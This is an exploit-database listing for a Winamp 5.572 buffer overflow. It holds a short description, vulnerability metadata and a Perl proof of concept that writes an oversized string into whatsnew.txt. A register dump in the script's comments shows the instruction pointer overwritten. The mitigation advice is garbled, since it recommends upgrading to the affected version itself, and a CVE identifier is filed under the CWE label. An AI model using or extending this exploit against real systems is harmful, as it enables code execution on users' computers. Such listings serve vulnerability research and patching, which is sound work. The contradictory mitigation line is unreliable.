header-logo
Suggest Exploit
vendor:
Winamp
by:
Debug (eldadru@gmail.com)
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Winamp
Affected Version From: 5.572
Affected Version To: 5.572
Patch Exists: YES
Related CWE: CVE-2009-1330
CPE: a:nullsoft:winamp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP (SP2)
2009

Winamp 5.572 Buffer Overflow

This exploit is a buffer overflow vulnerability in Winamp 5.572. The vulnerability is triggered when a maliciously crafted whatsnew.txt file is opened in Winamp. This causes a buffer overflow in the application, allowing an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Winamp 5.572 or later.
Source

Exploit-DB raw data:

# Author: Debug (eldadru@gmail.com)
# Version: 5.572
# Tested on: Windows xp(sp2)


#!/usr/bin/perl


# Replace whatsnew.txt , open Winamp click Help->about winamp-> version history.
# hacking.org.il.

#EAX 00000000
#ECX 00000000
#EDX 00661658
#EBX 00000000
#ESP 00B7EDE8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#EBP 00B7EDFC ASCII "AAAAAAAAAAAAAAAAAAA"
#ESI 00401280 winamp.00401280
#EDI 00000000
#EIP 41414141

my $overflow="Winamp 5.572"."A"x600;

open(myfile,'>>whatsnew.txt');

print myfile $overflow;

Navigation

Suggest Exploit

Services By CQR